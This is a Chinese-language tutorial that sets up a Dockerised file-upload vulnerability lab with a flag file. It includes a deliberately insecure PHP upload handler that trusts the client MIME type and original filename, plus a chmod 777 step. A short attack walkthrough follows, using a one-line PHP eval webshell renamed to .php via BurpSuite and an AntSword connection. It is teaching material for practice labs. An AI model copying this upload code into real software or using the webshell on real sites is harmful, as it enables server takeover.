上海三益建筑设计有限公司佛山seo培训机构

文件上传靶场

项目结构

upload-lab/
├── Dockerfile
└── www├── index.php└── upload└── flag.txt

执行命令流程（逐行执行）

创建目录结构

# 创建目录结构
mkdir upload-lab;cd upload-lab
mkdir -p www/upload# 创建flag文件
echo "flag{9PnZtLwEfR6vGhJ4}" > www/upload/flag.txt

写入Dockerfile

cat > Dockerfile <<EOF
FROM php:7.4-apache# 创建上传目录并设置权限
RUN mkdir -p /var/www/html/upload && \chown -R www-data:www-data /var/www/html && \chmod -R 755 /var/www/html# 复制网站文件
COPY www/ /var/www/html/# 设置flag文件
RUN echo "flag{you hack the upload lab}" > /var/www/html/upload/flag.txt && \chmod 644 /var/www/html/upload/flag.txt# 配置Apache
EXPOSE 80
EOF

写入PHP主文件index.php

touch www/index.php
cat > www/index.php <<'EOF'
<!DOCTYPE html>
<html>
<head><title>提交你喜欢的图片！</title><style>body { font-family: Arial, sans-serif; margin: 40px; background-color: #f0f0f0; }.container { max-width: 800px; margin: 0 auto; background: white; padding: 30px; border-radius: 10px; box-shadow: 0 0 10px rgba(0,0,0,0.1); }h1 { color: #333; text-align: center; margin-bottom: 30px; }.upload-box { border: 2px dashed #ccc; padding: 20px; text-align: center; margin-bottom: 20px; }.form-group { margin: 15px 0; }input[type="file"] { padding: 10px; background: #f8f8f8; border: 1px solid #ddd; }input[type="submit"] { background: #4CAF50; color: white; padding: 12px 24px; border: none; border-radius: 4px; cursor: pointer; font-size: 16px; }input[type="submit"]:hover { background: #45a049; }.result { margin-top: 20px; padding: 15px; border-radius: 4px; }.success { background: #dff0d8; color: #3c763d; }.error { background: #f2dede; color: #a94442; }</style>
</head>
<body><div class="container"><h1>图片上传入口</h1><div class="upload-box"><form enctype="multipart/form-data" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="100000" /><div class="form-group"><label>选择图片（JPEG/PNG，最大100KB）：</label><br><input type="file" name="uploaded" required></div><input type="submit" name="Upload" value="上传图片"></form></div><?phpif(isset($_POST['Upload'])) {$upload_dir = "upload/";$target_file = $upload_dir . basename($_FILES['uploaded']['name']);$uploaded_type = $_FILES['uploaded']['type'];$uploaded_size = $_FILES['uploaded']['size'];$html = '<div class="result ';if(($uploaded_type == "image/jpeg" || $uploaded_type == "image/png") && $uploaded_size < 100000) {if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_file)) {$html .= 'success">文件上传成功，保存路径：'.htmlspecialchars($target_file);} else {$html .= 'error">上传失败 - 系统错误';}} else {$html .= 'error">无效的文件类型或大小（仅支持JPEG/PNG，最大100KB）';}echo $html.'</div>';}?></div>
</body>
</html>
EOF

docker一键搭建

# 构建镜像
docker build -t upload-lab .# 运行容器
docker run -d -p 8002:80 --name upload-lab-container upload-lab

进入容器，然后设置容器内部的权限：

# 进入容器
docker exec -it upload-lab-container bash# 查看当前目录位置
cd /var/www/html/upload# 设置上传目录权限
chmod 777 .# 退出容器
exit

攻击过程

1. 创建webshell文件shell.jpg 内容：<?php @eval($_POST['cmd']);?>
2. 使用BurpSuite修改上传文件名为shell.jpg.php
3. 上传成功后使用蚁剑连接http://靶机IP:8002/upload/生成的文件名
4. 在webshell中执行命令读取flag.txt